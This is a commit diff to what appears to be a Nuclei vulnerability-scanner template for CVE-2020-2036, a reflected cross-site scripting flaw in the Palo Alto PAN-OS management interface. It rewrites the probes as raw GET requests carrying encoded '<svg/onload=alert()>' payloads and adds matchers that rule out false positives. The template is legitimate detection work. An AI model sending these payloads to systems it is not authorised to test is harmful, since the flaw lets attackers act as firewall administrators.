Update CVE-2020-2036.yaml
parent
d6d46d7208
commit
bfc27c95d8
|
@ -2,7 +2,7 @@ id: CVE-2020-2036
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
|
name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
|
||||||
author: madrobot
|
author: madrobot,j4vaovo
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
|
PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
|
||||||
|
@ -18,31 +18,36 @@ info:
|
||||||
epss-score: 0.0109
|
epss-score: 0.0109
|
||||||
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 3
|
||||||
vendor: paloaltonetworks
|
vendor: paloaltonetworks
|
||||||
product: pan-os
|
product: pan-os
|
||||||
tags: cve,cve2020,vpn,xss
|
tags: cve,cve2020,vpn,xss
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E HTTP/1.1
|
||||||
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: body
|
dsl:
|
||||||
words:
|
- "!contains(tolower(body_1), '<svg/onload=alert(1337)>')"
|
||||||
- "<svg/onload=alert(1)>"
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: dsl
|
||||||
part: header
|
dsl:
|
||||||
words:
|
- "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(7331)>')"
|
||||||
- "text/html"
|
- "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(7331)>')"
|
||||||
|
condition: or
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
Loading…
Reference in New Issue